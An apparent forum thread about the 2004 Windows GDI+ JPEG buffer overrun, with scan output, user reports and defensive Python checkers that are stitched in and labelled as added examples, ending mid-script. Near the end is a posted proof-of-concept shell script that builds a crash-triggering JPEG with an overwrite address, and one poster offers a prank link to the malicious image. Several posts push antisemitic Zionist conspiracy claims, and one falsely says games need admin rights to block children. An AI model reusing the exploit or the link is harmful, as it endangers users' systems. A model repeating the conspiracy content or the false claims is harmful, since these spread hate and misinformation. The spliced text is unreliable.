I went to a conference recently where Microsoft was explaining how to get games to behave under windows - for example don't write your save files to c:\program files and don't mess around with HKEY_LOCAL_MACHINE at runtime. There were less than ten people there, most of whom were speakers. And so I notice most games (and many other packages) require to be run with admin privileges. They still think they are writing DOS games, except with a snazzy graphics library.
yep I just updated my CA etrust scanner too and it detects it fine, to be safe i never extracted the file from the zip archive. Glad it detected it as my server relies on Etrust. Pestpatrol seems completely useless, never detects anything, maybe I should just get rid of it.
I'm just wondering how long it will take the spyware/adware people to exploit this like with one of their annoying banners. Also I expect this could also be done by the spam gangs to create more new zombies for spamming.
Anyone know the exact date of release?
Someone has finally posted an exploit to Usenet.
Let me guess: the subject was "Good Times"?
sudo ergo sum
If you wanted to, you could log in and delete the trojan files, as the un/pw on that page is the guy's master password for adding/downloading/deleting files.
"With Microsoft, you get Windows. With Linux, you get the full house" - unknown
The GDI Scan tool from ISC reveals that after all of the latest patches for Windows and Office, I am still left with vulnerable .dll files within office.
.dll dated May 2004.
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.GdiPlus_6595b64144ccf1df_1.0.0.0_x-ww_8d353f13\GdiPlus.dll
Version: 5.1.3097.0 -- Possibly vulnerable (Windows Side-By-Side DLL)
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.GdiPlus_6595b64144ccf1df_1.0.10.0_x-ww_712befd8\GdiPlus.dll
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.GdiPlus_6595b64144ccf1df_1.0.2600.1360_x-ww_24a2ed47\GdiPlus.dll
Further... the version of the GDI redistributable on the MSDN site still includes a vulnerable version of the GDI
On this fully patched Windows XP system GDI Scan reveals the following information:
Scanning Drive C:...
C:\Program Files\Common Files\Microsoft Shared\Office10\MSO.DLL
Version: 10.0.3501.0 -- Possibly vulnerable (Under OfficeXP only)
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL
Version: 11.0.6360.0
C:\Program Files\Common Files\Microsoft Shared\VGX\vgx.dll
Version: 6.0.2800.1106 -- Possibly vulnerable (Win2K SP2 and SP3 w/IE6 SP1 only)
C:\Program Files\Microsoft Office\OFFICE11\GDIPLUS.DLL
Version: 6.0.3264.0
C:\Program Files\Microsoft Works\GDIPLUS.DLL
Version: 5.1.3102.1360
C:\WINDOWS\$NtUninstallKB833998$\s
Version: 5.1.2600.1106 -- Possibly vulnerable (Backup for uninstall purposes)
C:\WINDOWS\$NtUninstallKB839645$\sxs.d
Version: 5.1.2600.1336 -- Possibly vulnerable (Backup for uninstall purposes)
C:\WINDOWS\system32\dllcache\sxs.dll
Version: 5.1.2600.1515
C:\WINDOWS\system32\dllcache\vgx.d
Version: 6.0.2800.1106 -- Possibly vulnerable (Win2K SP2 and SP3 w/IE6 SP1 only)
C:\WINDOWS\system32\sxs.dll
Version: 5.1.2600.1515
C:\WINDOWS\WinSxS\x86_Microsoft.Wi
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Gdi
Version: 5.1.3101.0 -- Possibly vulnerable (Windows Side-By-Side DLL)
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Gdi
Version: 5.1.3102.1360
Scan Complete.
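A listing like the one above is flat, and the point it makes is easy to miss: Windows Update replaced the system copy, but Office, Works and other products each shipped a private GDIPLUS.DLL that the OS patch never touches. The script below is an added example, not GDI Scan's or ISC's own code. It parses path/version pairs from GDI Scan-style output, lists the entries the scanner itself annotated, and separately reports every copy of a DLL that is older than the newest copy of that DLL in the same major.minor branch found on the machine. The sample listing is constructed to resemble the output above; the "Some Vendor" path and the completed sxs.dll backup path are placeholders, and grouping by major.minor branch is an assumption made so that Office's 6.x GDI+ is not compared against the 5.1.x Windows copy.

```python
import re
from collections import defaultdict

# Constructed sample modelled on the GDI Scan listing above. The
# "Some Vendor" path and the completed sxs.dll backup path are placeholders.
SAMPLE_SCAN = r"""Scanning Drive C:...
C:\Program Files\Microsoft Office\OFFICE11\GDIPLUS.DLL
Version: 6.0.3264.0
C:\Program Files\Microsoft Works\GDIPLUS.DLL
Version: 5.1.3102.1360
C:\Program Files\Some Vendor\Viewer\gdiplus.dll
Version: 5.1.3097.0 -- Possibly vulnerable (private application copy)
C:\WINDOWS\system32\sxs.dll
Version: 5.1.2600.1515
C:\WINDOWS\$NtUninstallKB839645$\sxs.dll
Version: 5.1.2600.1336 -- Possibly vulnerable (Backup for uninstall purposes)
Scan Complete.
"""

# One record is a path line immediately followed by a "Version:" line,
# optionally annotated by the scanner after " -- ".
RECORD_RE = re.compile(
    r"^(?P<path>[A-Za-z]:\\[^\r\n]+)\r?\n"
    r"Version: (?P<ver>\d+(?:\.\d+)*)(?: -- (?P<note>[^\r\n]*))?$",
    re.MULTILINE,
)


def parse_gdi_scan(text):
    """Return a list of {path, version (tuple of ints), note} dicts."""
    records = []
    for m in RECORD_RE.finditer(text):
        records.append({
            "path": m.group("path"),
            "version": tuple(int(p) for p in m.group("ver").split(".")),
            "note": m.group("note") or "",
        })
    return records


def flagged_by_scanner(records):
    """Paths the scanner itself annotated as possibly vulnerable."""
    return [r["path"] for r in records if "vulnerable" in r["note"].lower()]


def fmt(version):
    return ".".join(str(p) for p in version)


def stale_copies(records):
    """Copies older than the newest copy of the same DLL in the same
    major.minor branch. Returns sorted (path, version, newest) triples.
    This catches private per-application copies that a scanner's own
    version table may not know about."""
    branches = defaultdict(list)
    for r in records:
        name = r["path"].rsplit("\\", 1)[-1].lower()
        branches[(name, r["version"][:2])].append(r)
    stale = []
    for copies in branches.values():
        newest = max(c["version"] for c in copies)
        for c in copies:
            if c["version"] < newest:
                stale.append((c["path"], fmt(c["version"]), fmt(newest)))
    return sorted(stale)


if __name__ == "__main__":
    recs = parse_gdi_scan(SAMPLE_SCAN)
    print(f"{len(recs)} DLL copies found")
    for p in flagged_by_scanner(recs):
        print("scanner flagged:", p)
    for path, have, newest in stale_copies(recs):
        print(f"stale copy: {path} is {have}, newest on this box is {newest}")
```

The stale-copy report is the useful half: it does not need a list of fixed versions, only the scan output, so it still works for vendor copies that no scanner table covers.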
What you can do now to limit the spread:
* Update all of your virus checkers and make sure that they are fully active (auto, not just on-demand).
* Disable images in your email applications, just use text only.
* Switch your primary browser to Firefox or another browser whose latest version is immune from this specific attack. If you have to still use IE, then do so only for sites you truly trust.
It looks like Microsoft have always known this exploit existed from at least IE version 4. If you look carefully, you'll see they even implemented a fix for it;
M$ Internet Explorer -> Tools Menu Option -> Internet Options... -> Advanced Tab -> Multimedia -> Show Pictures Check Box
JE.
Just click on this link:
;-)
http://www.easynews.com/virus.jpg
[Please type your sig here.]
What's the world coming to when a man can't even trust his primary source of illegally and anonymously redistributed leeched fetish porn?
These people make me sick.
* Eye of Gnome seemed to work okay, but I got all sorts of weird redraw problems when I tried to resize the window.
* Gimp (2.1) says the JPEG is unsupported and couldn't be imported by the filter, then segfaults.
* Konqueror seems to work okay, but just shows a tall black rectangle, and its spinner is still chugging away, as if it's still busy loading something.
* Firefox 0.9.3 has no troubles at all; it just shows a nice white rectangle on a white background
These programs are not vulnerable to the exploit in the same way that Windows machines are vulnerable. In fact, the issues you saw appear to be in no way related to the intended result of the virus. GIMP's segfault seems to be the most serious of these, and it is still a minor problem. I believe all of your results can be achieved by opening a mangled/corrupted
Nutshell: One cannot conclude that graphics-related processes/apps on Linux machines are vulnerable to this virus.
PS Conclusions posited based on "unprofessional research and wild conjectures" are likely to cause much more harm than good. Is this really necessary? (not a flame - just an observation)
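What "mangled/corrupted" means for this particular file is spelled out in the proof of concept quoted further down the thread: a comment segment whose two-byte length field is 0 or 1. Every JPEG marker segment's length counts the length field itself, so any value below 2 is impossible in a valid file, and a decoder that computes length - 2 in unsigned arithmetic gets a huge byte count instead of an error. The checker below is an added example, not code from anyone in this thread: it walks the marker segments of a JPEG header and reports exactly that class of malformed length (plus truncated segments), which is the check a mail gateway or proxy filter would apply before handing a file to a decoder. The sample files are constructed inline; the 16-bit wrap-around it reports is illustrative, since the width a real decoder wraps at depends on its own arithmetic.

```python
import struct

# Markers that carry no length field: TEM, RST0-RST7, SOI, EOI.
STANDALONE_MARKERS = {0x01, 0xD8, 0xD9} | set(range(0xD0, 0xD8))


def check_jpeg_segments(data):
    """Walk the marker segments of a JPEG header and return a list of
    findings (strings). An empty list means the header is well formed
    up to the start-of-scan marker."""
    findings = []
    if data[:2] != b"\xFF\xD8":
        return ["no SOI marker at offset 0"]
    pos = 2
    while pos < len(data):
        seg_start = pos
        if data[pos] != 0xFF:
            findings.append(f"expected 0xFF at offset {pos}, got 0x{data[pos]:02X}")
            break
        while pos < len(data) and data[pos] == 0xFF:  # skip fill bytes
            pos += 1
        if pos >= len(data):
            findings.append(f"file ends inside the marker at offset {seg_start}")
            break
        marker = data[pos]
        pos += 1
        if marker == 0xD9:  # EOI
            break
        if marker in STANDALONE_MARKERS:
            continue
        if pos + 2 > len(data):
            findings.append(f"marker 0x{marker:02X} at offset {seg_start} has no length field")
            break
        (length,) = struct.unpack(">H", data[pos:pos + 2])
        if length < 2:
            # The length counts its own two bytes, so 0 and 1 are impossible.
            # A decoder doing (length - 2) in 16-bit unsigned arithmetic would
            # try to consume this many payload bytes instead of rejecting the file.
            wrapped = (length - 2) & 0xFFFF
            findings.append(
                f"segment 0x{marker:02X} at offset {seg_start} declares length {length} "
                f"(minimum is 2); length - 2 wraps to {wrapped} in 16-bit unsigned arithmetic"
            )
            break
        if pos + length > len(data):
            findings.append(
                f"segment 0x{marker:02X} at offset {seg_start} is truncated: "
                f"declares {length} bytes, {len(data) - pos} remain"
            )
            break
        if marker == 0xDA:  # SOS: entropy-coded data follows, header scan is done
            break
        pos += length
    return findings


# Constructed sample files (not from the page). A minimal JFIF prelude:
SOI = b"\xFF\xD8"
EOI = b"\xFF\xD9"
APP0 = (b"\xFF\xE0" + struct.pack(">H", 16) + b"JFIF\x00" + b"\x01\x01" + b"\x00"
        + struct.pack(">HH", 96, 96) + b"\x00\x00")
COMMENT = b"\xFF\xFE" + struct.pack(">H", 2 + len(b"ok")) + b"ok"
GOOD_JPEG = SOI + APP0 + COMMENT + EOI
# Same prelude, but the comment segment claims length 0 (or 1), the shape
# of the malformed file discussed in this thread, followed by zero filler.
BAD_JPEG_LEN0 = SOI + APP0 + b"\xFF\xFE\x00\x00" + b"\x00" * 16 + EOI
BAD_JPEG_LEN1 = SOI + APP0 + b"\xFF\xFE\x00\x01" + b"\x00" * 16 + EOI

if __name__ == "__main__":
    for name, blob in (("good", GOOD_JPEG), ("len0", BAD_JPEG_LEN0), ("len1", BAD_JPEG_LEN1)):
        print(name, check_jpeg_segments(blob) or "ok")
```

The checker stops at the first finding on purpose: once a length field is invalid there is no trustworthy way to resynchronise on the next marker, and a filter only needs a yes/no answer.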
I want to drag this out as long as possible. Bring me my protractor.
While they do have antivirus software and the ability to restore systems to a clean state on boot, they don't believe in firewalls because they "keep them from running software they need to run" on users' computers (and I quote from two sources). As a result, the computers they supply us with and that we aren't allowed to patch or fix constantly have issues.
Any of you sysadmins out there know of a valid reason NOT to run a firewall in these days of worms and the like?
Folks, can we please not post a direct link without the disclaimer? It seems to me to be a bit beyond rude.
For the record, here's the disclaimer (which I find silly, but that's not the point, I didn't decide to take on the exposure of hosting this thing for the researchers who will need access):
I don't know much of Linux internals, but I don't think it is obvious that it is vulnerable just because programs can get confused by unexpected data.
and be done with the problem once and forever?
;)
No, seriously
Or at least create one that warns victims about the hole..
Well actually it might be good too, this will probably further hasten the fall of IE and windows.
I hear that if you look at the jpeg, then your phone rings and you hear a voice say "seven days."
to SP2.......... It's That simple, pimple-heads.
Be quick.
Sample squid code:
Or, more reasonable:
and stick 209.171.43.27 into that file (and all following IPs that will use that code).
Then use ClamAV to scan your squid-cache the next couple of days and remove infected files.
And I've already seen the first ones bumping into my virus scanners (which luckily have a patch for these malformed jpgs)...
Come on, mods, mod that up.
We need to fight that _all_ as fast as possible.
Banner Ads and other types of ads have been getting bigger and more complicated (pop ups with video and sound), so what is your favorite way to block out ads from the internet?
MS IE can filter out ads using the security and content options.
Is there any better third party product that strips out banners and '1x1 pixel bugs' etc?
Just don't allow Windows boxes on the network. Problem solved....
Think Deeply.
I've taken this as a good opportunity to mail all my contacts who I know still use IE at the instance of corporate IT departments, asking them to suggest to their departments the immediate ability to install an alternative such as Firefox. I'm sure many others here do something similar, but for anyone who has not, it's situations like this which unfortunately can help us to promote a safer alternative browsing platform for all of us.
This is a conspiracy where the RIAA, the MPAA and the PPAA (P0rn Photographers Assoc of America) have colluded in order to discredit Usenet!
Ignore their efforts! Usenet forever!
"Count on this: If any 'terrorism' happens in the next 5 weeks, you can be sure it will have been be aided and abetted by the US and/or Israeli secret services."
uhm, WHAT?!?!?
i agree with parent, GP is a paranoid conspiracy anti semitic nut.
We only count the "days vulnerable" between the time when Microsoft acknowledges the exploit, to the time a fix is announced.
So. What's the days vulnerable on this one?
Got mine (the very same!) the same time.
Great little device with an extra 512 bar, great for all the people here!
Okee, useless post i know!
But good choice anyway!
When I was at college, all of the computers ran NT 3.51. So it was a common occurrence to enter a computer lab and see 1/4 of the computers sitting at the blue screen of death. There was a dramatic increase in quality when they upgraded all of the existing machines to NT4. Blue screens were very rare. Then again they waited for service pack 4 before upgrading, so I'm sure the previous versions were not as solid.
Well.. maybe. Or Maybe not. But Definitely not sort of.
This could possibly be the worst viruses yet!
Even MS Word's grammar feature would have caught this one...
There's been some discussion of the problems facing "fleet operators" due to this bug. It seems that various product teams have spewed so many private versions of the .DLLs all over users' systems that the people who maintain the security-patch list in XML just gave up. SMS won't detect the need for the patch, and neither will MBSA, I'm told. Whether SUS (standalone, not the Feature Pack for SMS) will is not yet clear.
Well, that's just dandy. I've got 200 machines that need patching and no centralized tools, maybe. Oh, joy.
Now I'm wondering how I'll ever trust those tools again.
--And you are a sputtering, pre-programmed fool. Anybody who has bothered to look beyond Fox and CNN will know; the Mossad is one of the most dangerous and prolific secret agencies on the planet; anybody who criticizes Israel in any significant way is asking for trouble. (Or air to surface missiles into their wheel chair.)
Seriously. Look beyond the prescribed. There are some very smart and very even-keeled people who, (unlike the shouting poster I'm responding to), are not filled with knee-jerk emotional buttons. These are people who have studied the many various issues, not with hate, but rather out of curiosity and a sense of responsibility to know what the truth is and to share it.
Look up: "Israeli Moving Companies" and "Dancing art students". Those two threads alone will pull an avalanche of data into your hands. --If you want to see it. --Don't stop on the first hysterical webpage and say, "See! I looked and it's all insane crap!" If you only want to see evidence to support your delusions, then that is certainly all you will find.
Michael Moore took a lot of care to avoid talking about the elephant in the living room with his latest film. He's no dolt; he knows that potato is just too hot. (That is, can you imagine an army of pre-programmed fools like the one I'm responding to burning copies of his film? I can.)
Despite the fact that the emotionally charged term, 'Anti-Semite' is growing less effective as rationality catches up to reality, I want to be clear:
I am not anti-semitic. I AM anti-Zionist. The Jews are caught in the cross-fire. The Semites, ALL Semites, both Jew and Arab, are the final target of this new World War. --You will probably not read a more essential and un-recognized truth for the rest of this year.
I've been saying it for several years, and now it's becoming very hard to ignore. . . WWII was a dry run. It's all starting to happen again.
JPEG viruses and plenty of tax-paid astro-turfing are par for this course. They only have to keep people confused and quiet for one more month and then guys like me can be arrested without hassle.
-FL
> I want to see what GraphicConverter does with this.
I'm not cruising the alt.binaries.erotica.* groups for the p0rn, I'm doing field research on this new trojan.Some mornings it's hardly worth chewing through the restraints to get out of bed.
... does this qualify as sabotage of Usenet by Micro$oft?
wow.. since all college students know how to use linux.
Since the .net framework is listed as vulnerable and RSS readers typically use it, will they need patching?
The developers have set up Doom3 and The Sims 2 to run as "root" (Windows) for a very good reason, and it's not because of programming incompetence. The reason they have done this is because both games are considered "adult" and not to be played by kids. This is why you need admin privileges, it's an attempt to "password protect" those games that are adult in nature. ICQ has explicitly stated, as a matter of fact, that this is why you need admin privileges to run it.
"Implications", not "implementations". I noticed just after I hit Submit. Sorry; I just got up.
Worst. Post. Ever.
Is some freshman psychology major going to format their drive, back up all their files, and install Linux? No. Are they going to be able to use Linux? Doubtful. Is linux going to detect their generic sound cards and network adapters? Yeah, right. Are you going to have chaos and pissed off students? Yes. Are you going be the one to tell them they can't use their brand new Dell without totally fucking re-doing all of the software or are you going to tell them it's worthless and to go spend $1000 on a new Mac?
You are seriously fucking stupid. Start living in the real world.
Linux isn't vulnerable to this particular image. In this case it only affects Microsoft's software.
-1 FUD slinging
UNIX and Linux systems take the concept "code reuse" to heart.
The benefits of code reuse are:
* Less disk space utilization
* Less memory utilization
* Easier and more comprehensive security fixes
The drawback is:
* Lots of interdependencies between apps and libraries
The RPM and DPKG package managers' main goals are to manage the dependencies that exist on the system so that all dependencies are met, and to keep them met during upgrades, removals, and installations.
Note that RPM and DPKG aren't creating the dependency issue (again, the issue is a natural by-product of the code reuse), they are there to manage it. Many clueless people rant about RPM and DPKG, it is amusing.
The "easier and more comprehensive security fixes" benefit is a HUGE deal, and this JPEG GDI+ issue is a perfect example.
You might have patched the OS itself, but still have many applications themselves that are vulnerable because they have their own private copy.
This is because in the Windows world, the tradeoff was taken to not have library and application interdependencies (no code reuse), but instead have standalone application installs.
This has the drawbacks of:
* More disk space utilization
* More memory utilization
* Harder and incomplete security fixes
So, say it with me. Hurray for dependency hell!
Another example of code reuse benefiting Linux:
A year or so ago, there was discovered a flaw in the zlib compression/decompression library used by many, MANY applications in Linux. By updating that one library in the /usr/lib directory all the apps were fixed too! (note that at the time, a few apps were found to have statically compiled in the zlib library, and those apps were patched to dynamically use the system zlib library from that point forward)
They need to scrap windows, and use some of that $50 billion and start from the ground up.
Why haven't they adopted a "sandbox" paradigm for applications to run in? Yes it would be slower, but it couldn't be worse than these issues
Agreed. This has the potential to be abused in that one can find their page linked to a Slashdot story then modify the content of the page to fit an agenda. Nip the problem in the bud and kill the link now as an example.
Transparently proxy web access. Log access to the norton AV update site, just a timestamp and an IP. Then you have a log of IP addresses and whether they have Norton installed, and the last time they updated.
If they don't update every two weeks, then trigger the transparent proxy so that any access to anything other than the Norton update page and the local page for downloading NAV displays a static page that says "Your access is blocked until you update your AV software." Give them a download link to grab their copy from.
It seems to me that you have a perfectly legitimate right to restrict access to a commons only to people who have taken steps to not be a threat to others in that area. You can require people to get immunized before going on a trip where they'll be in close contact with other people, so it seems you can require people to immunize their computers before you let them use YOUR equipment to put them in close proximity to other people's equipment.
How long will it be before a bunch of students sue a university to recoup cleanup costs because the university did not exercise due diligence in maintaining a clean network, when doing so is clearly technically feasible.
I don't want to make you feel stupid, but the argument you present here is actually a common misconception; I believed it once as well until I began to examine the puzzle more closely.
Try thinking of it this way. .
Your trying to discredit the idea of, "The Conspiracy," through ridicule (re, "CUCKOO, CUCKOO"), is in fact part of the very same 'Conspiracy'. --But you didn't take orders, nor did you receive an envelope from a shadowy figure. Still, this doesn't alter the fact that you are a part of a large group of people engendering a certain belief system, and that you are affecting how the world filters and perceives data and events. --If you get enough people doing as you do, repeating, "He's Crazy" often enough, then the perception is created of a sort of 'moral majority' at work. And people can be counted on in most cases to react in a few very specific ways;
-People, on a gut level, will Fear the ideas being ridiculed and want to look away or in fact join in the chorus of disagreement so as to be part of the 'popular' crowd and thus avoid being ostracized themselves. This social programming is typically installed during childhood on school yards, and it is one of the most powerful methods to control population behavior in use today.
That is, ridiculing and heaping social abuse upon a subject with enough strength will cause the rest of the world to look the other way. Almost every time. Amazing! And yet, where is the 'Vast Conspiracy?' to make this happen?
Oh, it's there. It's just far more effective than most people give it credit, and far more invisible. The interesting fact is that when it is in full effect, conspirators do not NEED to keep secrets because the population is actively, deliberately looking the other way.
That's why the points you raise about the impossibility of thousands of people keeping a secret, (while true!), is not an issue.
And let's look at an example of a recent 'conspiracy' which was caught, which has massive implications, and which everybody ignored, choosing instead to believe in the installed falsehood. .
--This recent story about Canwest Global [www.cbc.ca], which owns much of the news pie in Canada is an excellent example of a small number of people influencing millions in regard to the activities of Zionist Israel.
There are those two charged words; ask yourself. . . Are you reacting at this moment rationally or emotionally?
-FL
Interestingly, this is not wholly accurate. --It suggests that ALL Jews want to control everything, whereas my experience with Jews tells me that the power-mongers are, as in other nations, a small number of elite. Their supporters are either connected to that elite, or are, largely, programmed masses.
Zionism is masked as a Jewish creation. Zionism, after the history is examined, is clearly a manipulative force which has through many, many means, artificially created threats of all types to Jews in other nations, both direct and indirect, pushing them to re-locate to Israel. There is plenty of evidence of Zionist ties with the Third Reich and various non-Jewish power brokers such as Rothschildes, and of course, the US government.
The end goal, as I have said before, is to "Put all the eggs in one basket" to enable a more effective termination of the Jewish blood lines, and that this is one of the primary objectives to the coming World War.
The Jews are one of the most heavily manipulated groups on the planet, and one which is being herded ever closer toward self-destruction.
I don't see it as being avoidable at this point, but perhaps with continued warnings and muck-raking, some people living in Israel, or who are planning to move there, will wake up and perhaps manage to avoid the hammer before it falls.
-FL
I welcome it! But please, be sure to also review and include the other two or three comments I've made in responses to the others who commented on my post.
--I think it may be very likely that you are jumping to conclusions regarding my intent and beliefs. In any case, I'd be fascinated to know what your teacher's take would be.
-FL
If I'm not mistaken, in Outlook 2003, when it asks you to create a PST file you can do either the older 97-2002 with the 2gb limit or the 20gb PST file that only 2003 can do.
Forcing your customers to run a less secure system as a way of enforcing the 'adult' rating sounds like a dumb idea, oh and by the way I'm feeling cynical, and I'm a developer myself, so I'll just go ahead and say that I'm 99% sure this stuff is total garbage - it's just that they couldn't be bothered to make the games run if you're not admin.
I bet that problem was found in beta-testing for both games, and they decided not to fix it, and cooked up some bollocks about won't somebody please think of the children instead.
It's not due to programming incompetence per se - I'm guessing timescales/perceived small scale of the problem caused it not to be fixed.
Cynical old me :)
See http://www.openwall.com/advisories/OW-002-netscape-jpeg/.
I meant Sirius.
no it has the 2gb limit as well. i dont know where there is a setting to enable some other amount of space.
i have a 1.9gb .pst file thats horribly corrupted (well its actually "fixed" according to microsoft as Outlook locks the file so that it wont actually corrupt, i can not however delete any messages out of it or anything)
this is due to the 2gb bug that affects most 32bit things (ie its all 1's). i just coincidentally enough, ran across this problem with a user this morning. i am thinking of switching him to thunderbird but there is no calendar and lord knows no one can work without a calendar!
theres a tool that lobotomizes like 50megs RANDOMLY out of the store file which would presumably allow you to get in there and delete messages. i havent tried it yet.
(horribly offtopic i know)
I'll just use my special getting high powers one more time...
check the timestamps, assholes
er... need more information. Are you saying that the plugin format is already backwards compatible, and I need to adjust a setting? Or are you suggesting that the Mozilla team work on making the plugin format backwards compatible?
What if the extension is affected by the vulnerability?
If you don't know what I'm talking about... http://news.google.com/news?q=jpeg+virus
Anyway, since it's out there now I was doing some reading on Slashdot and found out a little bit of how it works. The article said that to check whether you have been infected by this trojan, look for a directory named c:\windows\system32\system\ that has nvsvc.exe and winrun.exe in it. I didn't, but how many images do you browse a day? So this one's making me a little nervous. I don't know if this will work but I think it definitely should.
I went to the command prompt and did the following:
cd\windows
cd system32
md system
cd system
copy con nvsvc.exe
hkjhgkjh Ctrl+Z
copy con winrun.exe
iohgihgo Ctrl+Z
attrib *.* +r +s
exit
It's a perfect time for being wasted.
A perfect time to watch the stars.
- Burden Brothers, "Beautiful Night"
I don't think it's a matter of making the format backwards compatible (I'm sure it already is, from 0.7 at least). Pretty sure most extensions are compatible, just that the devs only sanction them up to the current ff/moz version because that's all they've tested on. You could edit the source yourself... Anyhow I agree that it sucks, I lost quite a few useful extensions too: bugmenot (but I can use the webpage) and quicknote (which really sucks because I used that a lot), and javascript console viewer (which isn't so useful since I'm not using js anymore).
If you like you can edit the extension to be compatible, download the .xpi file and rename it to a zip, extract the install.rdf file and open it with a text editor. There you can edit the maxversion, then put the new install.rdf back in the zip, rename it back to xpi and open with firefox. Of course you use this at your own risk because something *might* have been broken between versions.
Hopefully now we've hit the 1.0 series the extensions can be made compatible for all 1.x versions.
He who defends everything, defends nothing. -- Fredrick The Great
Proof of concept exploit that creates a jpeg image to test for the buffer overrun vulnerability discovered under Microsoft Windows. Shellcode and valid addresses have been removed. /* CAN-2004-0200 */
#!/bin/sh
#
# The JPEG vuln is triggered by the 0 or 1 length field with an integer flaw
# The crafted JPEG header makes Windows crash a couple of different ways
# 1) First, it crashes when the image is opened.
# 2) Second, it crashes when hovering the mouse over the image.
#
# The pointer overwrite is pretty straight forward in a debugger
#
# Usage:
# sh ms04-028.sh > clickme.jpg
#
# Note: This isn't a ./hack
# - Plug in shellcode and get the address
# - You non-kiddies out there are smart enough to fill in the blanks
# - Until you do the above, it's just a stupid PoC crash
#
# It's ugly, but it works :)
#
# -perplexy-
#JPEG header 'n stuff
printf "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46"
printf "\x00\x01\x01\x01\x00\x60\x00\x60\x00\x00"
#Trigger string - 00 length field (01 works too)
printf "\xFF\xFE\x00\x00"
printf "\x45\x78\x69\x66\x00\x00\x49\x49\x2A\x00\x08\x00"
# 1) Opening directly in IE
#Address to overwrite = RtlEnterCriticalSection() - 4
#Check page 172 of SC Handbook for those of you playing along at home
printf "\x1C\xF0\xFD\x7F"
# 1) Opening directly in IE
#Address of shellcode
printf "\x41\x41\x41\x41"
#Other stuff
printf "\x96\x02\x00\x00\x1A\x00\x00\x00"
# 2) MouseOver in IE
#Address to overwrite = RtlEnterCriticalSection() - 4
#Check page 172 of SC Handbook for those of you playing along at home
printf "\x1C\xF0\xFD\x7F";
# 2) MouseOver in IE
#Address of shellcode
printf "\x41\x41\x41\x41"
#Comments here
perl -e 'print "A"x1000';
#Image junk here
printf "\x00\x00\x00\xFF\xDB\x00\x43\x00\x08\x06\x06\x07\x06\x05\x08\x07\x07";
printf "\x07\x09\x09\x08\x0A\x0C\x14\x0D\x0C\x0B\x0B\x0C\x19\x12\x13\x0F\x14";
printf "\x1D\x1A\x1F\x1E\x1D\x1A\x1C\x1C\x20\x24\x2E\x27\x20\x22\x2C\x23\x1C";
printf "\x1C\x28\x37\x29\x2C\x30\x31\x34\x34\x34\x1F\x27\x39\x3D\x38\x32\x3C";
printf "\x2E\x33\x34\x32\xFF\xDB\x00\x43\x01\x09\x09\x09\x0C\x0B\x0C\x18\x0D";
printf "\x0D\x18\x32\x21\x1C\x21\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\xFF\xC0\x00\x11\x08\x00\x03\x00\x03\x03\x01\x22";
printf "\x00\x02\x11\x01\x03\x11\x01\xFF\xC4\x00\x1F\x00\x00\x01\x05\x01\x01";
printf "\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05";
printf "\x06\x07\x08\x09\x0A\x0B\xFF\xC4\x00\xB5\x10\x00\x02\x01\x03\x03\x02";
printf "\x04\x03\x05\x05\x04\x04\x00\x00\x01\x7D\x01\x02\x03\x00\x04\x11\x05";
printf "\x12\x21\x31\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xA1\x08";
printf "\x23\x42\xB1\xC1\x15\x52\xD1\xF0\x24\x33\x62\x72\x82\x09\x0A\x16\x17";
printf "\x18\x19\x1A\x25\x26\x27\x28\x29\x2A\x34\x35\x36\x37\x38\x39\x3A\x43";
printf "\x44\x45\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64";
printf "\x65\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x83\x84\x85";
printf "\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4";
printf "\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3";
printf "\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE1";
printf "\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8";
printf "\xF9\xFA\xFF\xC4\x00\x1F\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01\x01";
printf "\x01\x00\x00\x00\x00\x00\x00
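The posted script's trigger is a COM segment (marker 0xFFFE) whose 16-bit length field is 0 or 1: the vulnerable decoder subtracted 2 from that length to size the segment payload, and a value below 2 underflows. As an added example that is not part of the thread or of the posted PoC, here is a Python marker walker that reports any segment declaring a length below the 2-byte minimum, the kind of structural check a mail gateway or upload handler can apply before handing an image to a native decoder. The sample inputs are constructed: the malformed one reuses the header bytes the script prints, the benign one carries a well-formed comment instead.

```python
"""Flag JPEG marker segments with an impossible (<2) length field.

Added example, not from the thread. MS04-028 / CAN-2004-0200 was triggered
by a COM segment declaring length 0 or 1; every JPEG segment length includes
the two length bytes themselves, so anything below 2 is malformed by
definition and is what this scanner reports.
"""
import struct

SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
# Markers that carry no length field: TEM, RST0..RST7, SOI, EOI.
STANDALONE = {0x01, SOI, EOI} | set(range(0xD0, 0xD8))


def scan_jpeg(data: bytes) -> list:
    """Walk the marker structure; return [(offset, marker, declared_length)] findings.

    declared_length is None when the file ends inside a length field. Walking
    stops at SOS because entropy-coded data follows, and at the first finding
    because the payload size after an underflow is undefined.
    """
    if len(data) < 2 or data[:2] != b"\xFF\xD8":
        raise ValueError("not a JPEG: missing SOI")
    findings = []
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            break  # lost marker sync; do not guess
        marker = data[pos + 1]
        if marker == 0xFF:  # fill byte before a marker
            pos += 1
            continue
        if marker in STANDALONE:
            if marker == EOI:
                break
            pos += 2
            continue
        if pos + 4 > len(data):
            findings.append((pos, marker, None))
            break
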